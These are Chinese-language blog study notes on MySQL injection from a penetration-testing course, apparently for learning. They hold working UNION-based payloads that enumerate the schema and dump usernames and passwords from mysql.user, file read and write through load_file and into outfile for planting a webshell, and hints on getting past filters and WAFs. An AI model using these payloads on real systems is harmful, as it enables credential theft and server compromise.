[小迪安全第12天]mysql注入

最新推荐文章于 2023-04-20 17:08:46 发布
最新推荐文章于 2023-04-20 17:08:46 发布
阅读量183 收藏 2
点赞数 1
分类专栏: 小迪安全笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54252904/article/details/116135799
版权

mysql注入

跨库注入

数据库中的information_schema:
tables表中记录着所有的表:
schemata表记录所有数据库名

union select 1,2,group_concat(schema_name) from information_schema.schemata
获取所有数据库名字
在这里插入图片描述
在这里插入图片描述

获取数据库名为"mysql"的所有表名
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=“mysql”
在这里插入图片描述

获取数据库为mysql中的表为user的所有字段
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=“mysql” and table_name=‘user’
在这里插入图片描述

获取表中指定数据
union select 1,2,group_concat(User,Password) from mysql.user在这里插入图片描述

文件读写
  • load_file(): 读取函数
  • into outfile 或 into dumpfile: 导出函数

路径常见的读写方法:

select load_file(“e:/a.txt”);
select “write” into outfile “e:/a.txt”;

通过读写文件来执行相关的语句如写入一句话木马和查看系统本地重要文件等危险操作
但读文件和写文件都需要直到网站路径,即通过一些手段来查询网站路径是很关键的
一般查询为:

  • 报错显示
  • 遗留文件如phpinfo
  • 漏洞报错 (通过网上查询如:phpmyasmin爆路径)
  • 平台配置文件 (存在默认安装路径如apache)
  • 爆破等
魔术引号

当开启magic_quotes_gpc=On或使用addslashes()函数时会对个别字符进行转移因此采取绕过的方法

编码绕过

在这里插入图片描述
转换成hex成功绕过
在这里插入图片描述

防御机制
内置函数

类型判断如:判断是否为Int类型(无法绕过)
在这里插入图片描述

过滤关键字

把关键字select 过滤为fuck这种可以采取他的不严谨型进行绕过如采用大写Select
在这里插入图片描述
在这里插入图片描述

waf
  • 更改提交方法
  • 大小写混合
  • 解密编码类
  • 注释符混用
  • 等价函数替换
  • 特殊符号混用
  • 借助数据库特性
  • HTTP参数污染
  • 垃圾数据溢出等
道长在此
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
B站小迪安全笔记12-SQL注入之简要注入
m0_61530426的博客
07-20 639
B站小迪安全笔记
2020小迪培训(第12 WEB 漏洞--SQL 注入之简要SQL注入
是阿明呐的博客
08-07 714
WEB 漏洞-SQL 注入之简要SQL注入 ​ 在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞是WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。(右边是重点) SQL注入安全测试中危害 危害数据库里的数据 直接危害到网站的权限(需要满足条件) SQL注入产生原理详细分析 原理:通过参数传递将恶意SQL语句传到SQL语句,实现自定义的
小迪安全学习笔记--第12:web漏洞-SQL注入之简要SQL注入
zr1213159840的博客
11-06 2934
课程链接 第12:web漏洞-SQL注入之简要SQL注入 在本系列课程学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 SQL注入安全测试中危害 SQL注入能够操作数据。有些可以获取权限,如getwebshell SQL注入产生原理详细分析 id接收到数据,然后再sql中进行了拼接,最后再result中进行了执
小迪教程第十二天——XSS攻击
仲夏
10-22 428
1、xss分类反射型(非持续型) www.xx.com/news.asp?id=1 存储型(持续型)2、xss原理数据在处理输出输入的问题上带来的js语句执行(html)3、如何寻找xss漏洞,判断xss漏洞是那种类型1、工具扫描(如wvs),手工探针2.xss漏洞攻击手法有哪些 csrf3.xss绕过技巧同源策略 www.xxbank.com/fukuan.php?name=xiaodi&
小迪安全|第12:SQL注入之简要SQL注入
欢迎相互探讨交流知识呀~
11-15 1080
笔记
小迪安全》第13 SQL注入Mysql注入
m0_56250796的博客
04-20 255
select 关键字过滤 $id = str_replace('select', 'fuck', $id) 但有时过滤关键字没有做大小写防护可以换 Select、SELECT尝试。
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
PHP+mysql防止SQL注入的方法小结
12-20
本文实例讲述了PHP+mysql防止SQL注入的方法。分享给大家供大家参考,具体如下: SQL注入 例:脚本逻辑 $sql = "SELECT * FROM user WHERE userid = $_GET[userid] "; 案例1: 复制代码 代码如下:SELECT * FROM t ...
PHP+MYSQL 注入靶场
最新发布
04-26
通过这个靶场,你可以模拟真实环境下的安全测试,提升对SQL注入攻击的防御能力。下面将详细阐述SQL注入、PHP和MySQL在其中的作用以及如何进行渗透测试。 **SQL注入**是一种常见的网络安全威胁,发生在应用程序未能...
小迪安全12 web漏洞,SQL注入之简要SQL注入
qq_46116117的博客
12-02 1582
12 web漏洞,SQL注入之简要SQL注入 前言: ​ 在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入 又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需 要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞是 WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的 SQL注入中需要学习到的知识点 (右边比较容易理解,左边比较困难) SQL注入安全测试中的危害 1.SQL注入能够操控数据库里面的数据 2.可以直接进行后门的写入,直接getsh
小迪安全》第12 Web漏洞:SQL注入
m0_56250796的博客
04-12 265
在本系列课程学习中,SQL注入漏洞将是重点部分,SQL注入非常复杂,区分各种数据库类型、提交方法、数据类型等注入,需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是Web安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
[小迪安全27]绕过httponly
weixin_54252904的博客
06-06 3601
httponly(只是限制了cookie被盗取) HttpOnly是包含在http返回头Set-Cookie里面的一个附加的flag,所以它是后端服务器对cookie设置的一个附加的属性,在生成cookie时使用HttpOnly标志有助于减轻客户端脚本访问受保护cookie的风险(如果浏览器支持的话) 通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击。 使用xss盗取的cookie为空 表单劫持(没有保存密码) 通过xss平台的表单劫持模块,填写目标表单所对应的属性 这里小
小迪安全36】验证码与Token
weixin_54252904的博客
06-17 851
验证码识别 使用工具:pakv_http_fuzz 复制验证码图片数据包中的请求头信息,不用cookie和host 使用工具的图像型验证码识别,把请求头信息粘贴到其他请求头位置,验证码地址就填图片验证码地址 选择第三方识别引擎,点击识别,开始识别 使用工具:Burpsuite插件 下载地址:https://github.com/c0ny1/captcha-killer/releases/tag/0.1.2 burpsuite添加插件: ...
[小迪安全31]php文件包含
weixin_54252904的博客
06-04 771
文件包含文件包含跨目录包含受限制的包含远程文件包含文件包含伪协议玩法 文件包含 include.php 1.txt <?phpinfo()?> 访问地址:127.0.0.1:8080/include.php?filenmae=1.txt 执行php效果 跨目录包含 受限制的包含 <?php $file = $_GET['filename']; include($file.".html"); ?> 从报错信息得知在包含的文件后添加了.html 解决方法: 00截断 前提
[小迪安全第8]站点搭建分析
weixin_54252904的博客
04-21 755
信息收集站点搭建分析目录型站点端口类站点子域名站点类似域名站点旁注,C段站点搭建软件特征站点 站点搭建分析 目录型站点 通过访问网站如果目录下的网站差别特别大可能就是采取了不同的设定方案 网站里的目录采用不同的程序方案那就有更多的可能来对站点进行测试 由上可以看出只是变化了个目录就完全不是一个不同的网站了,而且两个网站的cms不同 端口类站点 通过对网站IP不同的端口访问得到不同的网站信息 如果一个端口遭殃另一个也跟着遭殃,那就有更多的机会来进行安全测试 端口不同查询的结果不同 子域名站点
[小迪安全20-23]文件上传
weixin_54252904的博客
05-16 660
nginx解析漏洞 在后面添加/1.php实现png解析php fincms上传漏洞 通过上传头像修改png格式为php 但返回上传错误但却是是上传上去了 通过查看网站标题得知网站时fincms搭建可以上网查看漏洞得知有上传漏洞 虽然提示上传失败但却是后台成功上传,查看漏洞直到上传文件路径为 /uploadfile/member/(用户uid)/0x0.php Weblogic任意文件上传 https://vulhub.org/#/environments/weblogic/CVE-2
小迪安全第37】反序列化
weixin_54252904的博客
06-20 586
PHP反序列化 原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。 serialize() //将一个对象转换成一个字符串 unserialize() //将字符串还原成一个对象 演示一把 上代码 改代码中接受以get方式传过来的str参数的值,并且如果该值经过反序列化之后的值如果等于$key(xiaodi)时就输出flag 因此我
PHP+MySQL注入详解与防范策略
SQL Injection with MySQL 注入分析是一篇由作者angel原创的IT技术文章,主要针对国内相对较少见的php+MySQL编程环境下的SQL注入问题进行深入探讨。随着Web应用程序的发展,SQL注入已经成为一种常见的安全漏洞,尤其...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值